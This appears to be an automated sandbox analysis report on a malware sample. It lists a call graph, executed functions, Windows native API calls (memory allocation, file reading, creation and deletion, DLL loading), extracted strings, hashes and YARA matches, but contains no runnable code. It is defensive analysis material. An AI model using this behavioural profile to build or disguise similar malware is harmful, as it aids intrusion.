RtlAllocateHeap 96440->96442 96441->96422 96443 4cad9c 96442->96443 96443->96422 96445 4b037c 96444->96445 96455 4c8020 96445->96455 96451 4c7f00 96448->96451 96450 4c9c21 96450->96438 96452 4c7f24 96451->96452 96453 4c7f8a 96451->96453 96452->96450 96454 4c7fa0 NtAllocateVirtualMemory 96453->96454 96454->96450 96456 4c803a 96455->96456 96459 2eb2c70 LdrInitializeThunk 96456->96459 96457 4b0382 96457->96430 96459->96457 96460 4ab1a0 96461 4c9bf0 NtAllocateVirtualMemory 96460->96461 96462 4ac811 96460->96462 96461->96462 96463 4bece0 96464 4bed44 96463->96464 96492 4b5d00 96464->96492 96466 4bee74 96467 4bee6d 96467->96466 96499 4b5e10 96467->96499 96469 4bf013 96470 4beef0 96470->96469 96471 4bf022 96470->96471 96503 4beac0 96470->96503 96472 4c7da0 NtClose 96471->96472 96474 4bf02c 96472->96474 96475 4bef25 96475->96471 96476 4bef30 96475->96476 96477 4c9d60 RtlAllocateHeap 96476->96477 96478 4bef59 96477->96478 96479 4bef78 96478->96479 96480 4bef62 96478->96480 96512 4be9b0 CoInitialize 96479->96512 96481 4c7da0 NtClose 96480->96481 96483 4bef6c 96481->96483 96484 4bef86 96514 4c7880 96484->96514 96486 4bf002 96487 4c7da0 NtClose 96486->96487 96488 4bf00c 96487->96488 96489 4c9c80 RtlFreeHeap 96488->96489 96489->96469 96490 4befa4 96490->96486 96491 4c7880 LdrInitializeThunk 96490->96491 96491->96490 96493 4b5d33 96492->96493 96494 4b5d57 96493->96494 96518 4c7930 96493->96518 96494->96467 96496 4b5d7a 96496->96494 96497 4c7da0 NtClose 96496->96497 96498 4b5dfa 96497->96498 96498->96467 96500 4b5e35 96499->96500 96523 4c7710 96500->96523 96504 4beadc 96503->96504 96505 4b41e0 LdrLoadDll 96504->96505 96507 4beafa 96505->96507 96506 4beb03 96506->96475 96507->96506 96508 4b41e0 LdrLoadDll 96507->96508 96509 4bebce 96508->96509 96510 4b41e0 LdrLoadDll 96509->96510 96511 4bec28 96509->96511 96510->96511 96511->96475 96513 4bea15 96512->96513 96513->96484 96515 4c789d 96514->96515 96528 2eb2ba0 LdrInitializeThunk 96515->96528 96516 4c78cd 96516->96490 96519 4c794a 96518->96519 96522 2eb2ca0 LdrInitializeThunk 96519->96522 96520 4c7976 96520->96496 96522->96520 96524 4c772a 96523->96524 96527 2eb2c60 LdrInitializeThunk 96524->96527 96525 4b5ea9 96525->96470 96527->96525 96528->96516 96529 4b07e0 96530 4b07fa 96529->96530 96531 4b41e0 LdrLoadDll 96530->96531 96532 4b0818 96531->96532 96533 4b085d 96532->96533 96534 4b084c PostThreadMessageW 96532->96534 96534->96533 96535 4c7c20 96536 4c7cbc 96535->96536 96538 4c7c44 96535->96538 96537 4c7cd2 NtReadFile 96536->96537 96539 4c4da0 96540 4c4dfa 96539->96540 96542 4c4e07 96540->96542 96543 4c2930 96540->96543 96544 4c9bf0 NtAllocateVirtualMemory 96543->96544 96545 4c2971 96544->96545 96546 4b41e0 LdrLoadDll 96545->96546 96548 4c2a76 96545->96548 96549 4c29b7 96546->96549 96547 4c29f0 Sleep 96547->96549 96548->96542 96549->96547 96549->96548 96550 4b937b 96551 4b938a 96550->96551 96552 4c9c80 RtlFreeHeap 96551->96552 96553 4b9391 96551->96553 96552->96553 96554 4b7f71 96555 4b7f76 96554->96555 96557 4b7ef2 96554->96557 96555->96557 96558 4b69d0 LdrInitializeThunk LdrInitializeThunk 96555->96558 96558->96557 96559 2eb2ad0 LdrInitializeThunk 96560 4b6df0 96561 4b6df7 96560->96561 96562 4b6db4 96560->96562 96563 4b6dc2 96562->96563 96564 4ba960 9 API calls 96562->96564 96564->96563 96565 4b67b0 96566 4b67da 96565->96566 96569 4b76f0 96566->96569 96568 4b6804 96570 4b770d 96569->96570 96576 4c7510 96570->96576 96572 4b775d 96573 4b7764 96572->96573 96574 4c75e0 LdrInitializeThunk 96572->96574 96573->96568 96575 4b778d 96574->96575 96575->96568 96577 4c759d 96576->96577 96579 4c7531 96576->96579 96581 2eb2f30 LdrInitializeThunk 96577->96581 96578 4c75d6 96578->96572 96579->96572 96581->96578 96582 4b2477 96583 4b5d00 2 API calls 96582->96583 96584 4b24a3 96583->96584 96585 4c7270 96586 4c72f4 96585->96586 96587 4c7294 96585->96587 96590 2eb2ee0 LdrInitializeThunk 96586->96590 96588 4c7325 96590->96588

                              Executed Functions

                              Function 004A9460 Relevance: 50.5, Strings: 40, Instructions: 489COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 26 4a9460-4a9938 27 4a9942-4a9946 26->27 28 4a9948-4a996d 27->28 29 4a996f-4a9979 27->29 28->27 30 4a998a-4a9996 29->30 31 4a9998-4a99a1 30->31 32 4a99ae-4a99b5 30->32 33 4a99ac 31->33 34 4a99a3-4a99a6 31->34 35 4a99e7-4a99ee 32->35 36 4a99b7-4a99e5 32->36 33->30 34->33 37 4a9a20-4a9a27 35->37 38 4a99f0-4a9a1e 35->38 36->32 40 4a9a59-4a9aaa 37->40 41 4a9a29-4a9a57 37->41 38->35 42 4a9abb-4a9ac4 40->42 41->37 43 4a9ac6-4a9ad2 42->43 44 4a9ad4-4a9ad8 42->44 43->42 46 4a9ada-4a9ae1 44->46 47 4a9ae4-4a9aee 44->47 46->47 48 4a9aff-4a9b08 47->48 49 4a9b0a-4a9b1c 48->49 50 4a9b1e-4a9b28 48->50 49->48 52 4a9b39-4a9b45 50->52 53 4a9b5b-4a9b65 52->53 54 4a9b47-4a9b59 52->54 56 4a9b76-4a9b82 53->56 54->52 57 4a9b94-4a9b9e 56->57 58 4a9b84-4a9b8a 56->58 61 4a9baf-4a9bbb 57->61 59 4a9b8c-4a9b8f 58->59 60 4a9b92 58->60 59->60 60->56 63 4a9bbd-4a9bcf 61->63 64 4a9bd1-4a9be4 61->64 63->61 66 4a9beb-4a9bf4 64->66 67 4a9bfa-4a9c04 66->67 68 4a9e31-4a9e38 66->68 71 4a9c15-4a9c21 67->71 69 4a9e3e-4a9e48 68->69 70 4a9f32-4a9f3c 68->70 74 4a9e59-4a9e65 69->74 72 4a9c39-4a9c40 71->72 73 4a9c23-4a9c2c 71->73 77 4a9c42-4a9c5f 72->77 78 4a9c61-4a9c6b 72->78 75 4a9c2e-4a9c31 73->75 76 4a9c37 73->76 79 4a9e7c-4a9e86 74->79 80 4a9e67-4a9e7a 74->80 75->76 76->71 77->72 82 4a9c7c-4a9c88 78->82 84 4a9e97-4a9ea0 79->84 80->74 85 4a9c8a-4a9c96 82->85 86 4a9ca6-4a9cbf 82->86 87 4a9ea2-4a9eb4 84->87 88 4a9eb6-4a9ec0 84->88 89 4a9c98-4a9c9e 85->89 90 4a9ca4 85->90 86->86 93 4a9cc1-4a9cd4 86->93 87->84 92 4a9ed1-4a9edd 88->92 89->90 90->82 95 4a9edf-4a9ef1 92->95 96 4a9ef3 call 4c9920 92->96 97 4a9ce5-4a9cf1 93->97 98 4a9ec2-4a9ecb 95->98 102 4a9ef8-4a9f02 96->102 100 4a9cf3-4a9cff 97->100 101 4a9d01-4a9d08 97->101 98->92 100->97 104 4a9d0a-4a9d3d 101->104 105 4a9d3f-4a9d4e 101->105 106 4a9f13-4a9f1c 102->106 104->101 107 4a9dca-4a9dde 105->107 108 4a9d50-4a9d57 105->108 106->70 109 4a9f1e-4a9f30 106->109 112 4a9def-4a9dfb 107->112 110 4a9d59-4a9d8c 108->110 111 4a9d8e-4a9d98 108->111 109->106 110->108 114 4a9da9-4a9db2 111->114 115 4a9e19-4a9e2c 112->115 116 4a9dfd-4a9e09 112->116 117 4a9dc8 114->117 118 4a9db4-4a9dc6 114->118 115->66 119 4a9e0b-4a9e11 116->119 120 4a9e17 116->120 117->68 118->114 119->120 120->112
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: L$!e$'$)~$*z$.,$0$3$6$7$8=$:$:^$?$C$ExK$I%$My$O$P5$V$Z$\$^^$b$c$h*$n$nr$r6$s|$t$x$z}$|#$}:$1$B$K$X
                              • API String ID: 0-580166099
                              • Opcode ID: 950a2d8b88b5a684f9517bbff6c9907d79761612d8420b7cbdaab337cef199d3
                              • Instruction ID: efced42ec1145bed4f52bd0da07e946a1ab1f58837bcf86bfbba5847d6ffba12
                              • Opcode Fuzzy Hash: 950a2d8b88b5a684f9517bbff6c9907d79761612d8420b7cbdaab337cef199d3
                              • Instruction Fuzzy Hash: 8752A9B0D05669CBEB64CF45C898BDDBBB1BB56308F2081DAC1096B290D7B91EC9CF45
                              Function 004BBC00 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 004BBCE4
                              • FindNextFileW.KERNELBASE(?,00000010), ref: 004BBD1F
                              • FindClose.KERNELBASE(?), ref: 004BBD2A
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                              • Instruction ID: 6e1f75fd1735c96c958a8def01361b2cf76fd97d80bb19907e0c58fbba90f04c
                              • Opcode Fuzzy Hash: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                              • Instruction Fuzzy Hash: BA3192B5900248BBEB60DB65CC85FFF777CDB45708F10445DB909A7181DBB8AA848BA8
                              Function 004C7AC0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004C7BB3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                              • Instruction ID: 20651327790ced314b14f638ae401209189ee6789c5a5ce0e444d528a2092470
                              • Opcode Fuzzy Hash: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                              • Instruction Fuzzy Hash: BD31B4B5A00608AFCB54DF99D881EDEB7B9EF8C714F10821EF919A7340D774A8118FA5
                              Function 004C7C20 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004C7CFB
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                              • Instruction ID: 9ea87370065e0be3cd51da17ff1322db626687170bcef11c022a23cf5884aac9
                              • Opcode Fuzzy Hash: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                              • Instruction Fuzzy Hash: C731E8B5A00608AFDB14DF99D881EEFB7B9EF8C314F10811EF909A7241D674A8118FA5
                              Function 004C7F00 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(004B174E,?,?,00000000,00000004,00003000,?,?,?,?,?,?,004B174E,004C9C21,?,?), ref: 004C7FBD
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                              • Instruction ID: 37a004604913af9bc5105a3fdbc0e12961aa636b6ae0b0fe90b150de5f849d9c
                              • Opcode Fuzzy Hash: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                              • Instruction Fuzzy Hash: 552105B5A00609AFDB14DF99DC41FAFB7A9EF88704F00811EFD09A7241D778A8118BA5
                              Function 004C7D10 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteFile
                              • String ID:
                              • API String ID: 4033686569-0
                              • Opcode ID: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                              • Instruction ID: 24971cd965324c7933ed3cbbf1c5d26022c25451a5927b715973085d37e9b0b0
                              • Opcode Fuzzy Hash: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                              • Instruction Fuzzy Hash: B801A575A006087FD610EAA9DC06FBB776CDF85714F00400EFA09A7141D7B479048BE5
                              Function 004C7DA0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004C7DD7
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                              • Instruction ID: 0cf650d4331f0b995bd33ef4f042c468a59f74c53b65abdc069045ce3f061316
                              • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                              • Instruction Fuzzy Hash: 3EE04F362002147BC220AA6ACC01FA7775CDBC5754F40401AFA08E7142C670790187E5
                              Function 02EB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: d56441e53758abd33ad3579a812f35285b71f46e11bd5c1c584b28d460f3aaa8
                              • Instruction ID: f72e2c319e7d2d0f17e36a961aa378b518520aaed7154893c2ad5ae6ef3ef582
                              • Opcode Fuzzy Hash: d56441e53758abd33ad3579a812f35285b71f46e11bd5c1c584b28d460f3aaa8
                              • Instruction Fuzzy Hash: 6E900231645800129581B1994A85547400597E0301B65D015E0424554C8A158A579361
                              Function 02EB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 1c66c95b22203ef07fd4bb25f3e8e0081a7818dc164fafcd7675b33ec2c0cfa9
                              • Instruction ID: abf6499ac4e6803da030e1cbb2605f743152e093e8988d4af1fe874af670b155
                              • Opcode Fuzzy Hash: 1c66c95b22203ef07fd4bb25f3e8e0081a7818dc164fafcd7675b33ec2c0cfa9
                              • Instruction Fuzzy Hash: 20900271641500424581B1994A05407600597E13013A5D119A0554560C86198956D269
                              Function 02EB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b83a613da759510f7931a97f03ba7d2397f3003f9a06de8061c36772eda5d76d
                              • Instruction ID: ee6fc1b9eafc91727da4a31cafbccc77f3dafeed4e2584eb3ecd07062edbebd2
                              • Opcode Fuzzy Hash: b83a613da759510f7931a97f03ba7d2397f3003f9a06de8061c36772eda5d76d
                              • Instruction Fuzzy Hash: ED900235261400020586F599070550B044597D63513A5D019F1416590CC62289669321
                              Function 02EB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: eb19c60b90daa9d477a0c0b9d0768941a15a241cec32a15a101ad78fcbc740e4
                              • Instruction ID: c349bdfb09521d267b77319481eb4d651e160a551c907160c6e02549b204abfa
                              • Opcode Fuzzy Hash: eb19c60b90daa9d477a0c0b9d0768941a15a241cec32a15a101ad78fcbc740e4
                              • Instruction Fuzzy Hash: 74900435351400030547F5DD07055070047C7D5351375D035F1015550CD733CD73D131
                              Function 02EB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 19b039b2a628d1a9a789485161a33aa6e0c05781514135dfdbe9f2a62de78bc6
                              • Instruction ID: 703e006dde25955771e714cf505055369f4d329fb7c059ff02a108a646e1f81a
                              • Opcode Fuzzy Hash: 19b039b2a628d1a9a789485161a33aa6e0c05781514135dfdbe9f2a62de78bc6
                              • Instruction Fuzzy Hash: 5B90023124544842D581B1994605A47001587D0305F65D015A0064694D96268E56F661
                              Function 02EB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 5104955b33175fab966a931e813573c52b5ab2e5abb64a6380d55b0bca82c90c
                              • Instruction ID: 866c87deb95d7f4480c9ce3fbbf71aaf843c2982a2463b34972326ea5b489684
                              • Opcode Fuzzy Hash: 5104955b33175fab966a931e813573c52b5ab2e5abb64a6380d55b0bca82c90c
                              • Instruction Fuzzy Hash: EC90023124140802D5C1B199460564B000587D1301FA5D019A0025654DCA168B5AB7A1
                              Function 02EB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 20d938d222b46e1bb7bacb13c9d218e4fc5e640981f601f30837a134f1ed95ed
                              • Instruction ID: db74f1694ce9bb2653a513b36103d8d25b70e827e9c30bbda2083ef2a4b45b29
                              • Opcode Fuzzy Hash: 20d938d222b46e1bb7bacb13c9d218e4fc5e640981f601f30837a134f1ed95ed
                              • Instruction Fuzzy Hash: 4B90023164540802D591B1994615747000587D0301F65D015A0024654D87568B56B6A1
                              Function 02EB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: feda8a2068ce06972a253377835de938c55630fe2f78358e72852978da408000
                              • Instruction ID: 512f97cccd8acb71f9e0715beaa412b5e6570591ed6d00c80985b88ef738a062
                              • Opcode Fuzzy Hash: feda8a2068ce06972a253377835de938c55630fe2f78358e72852978da408000
                              • Instruction Fuzzy Hash: 59900271242400034546B1994615617400A87E0201B65D025E1014590DC5268992A125
                              Function 02EB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a8071a95de88f86e565fd6b3f91802d4151669f15b5d2bc814bde7c3d5209ca2
                              • Instruction ID: d942a538c59b26a523a591a0336f9c8caaba56b62a30936266e81d493fa582b6
                              • Opcode Fuzzy Hash: a8071a95de88f86e565fd6b3f91802d4151669f15b5d2bc814bde7c3d5209ca2
                              • Instruction Fuzzy Hash: 0E90027124180403D581B5994A05607000587D0302F65D015A2064555E8A2A8D52A135
                              Function 02EB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2f5cd366e8ffc009f1e99911d731833145e91eae1c103ec4e6bf60f9f5d53694
                              • Instruction ID: beb936ff171c59fb2d533193ae3beb9a9103fe11df012cb90a12476eee33f03e
                              • Opcode Fuzzy Hash: 2f5cd366e8ffc009f1e99911d731833145e91eae1c103ec4e6bf60f9f5d53694
                              • Instruction Fuzzy Hash: A890023164140502D542B1994605617000A87D0241FA5D026A1024555ECA268A93E131
                              Function 02EB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: f32f20ccaa2524008e5b6387c975a36b2fc17da518ccb3192150584ed5eaedef
                              • Instruction ID: 0f50babd479c80d83fe4a56bc57c43d2bfdc9e94e8bc037a2df0cd0516815814
                              • Opcode Fuzzy Hash: f32f20ccaa2524008e5b6387c975a36b2fc17da518ccb3192150584ed5eaedef
                              • Instruction Fuzzy Hash: A8900231251C0042D641B5A94E15B07000587D0303F65D119A0154554CC91689629521
                              Function 02EB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: d31f0d206b5fd59311fc0ec3a4b9daedf519ad9713344ac155aab7d0ade2a516
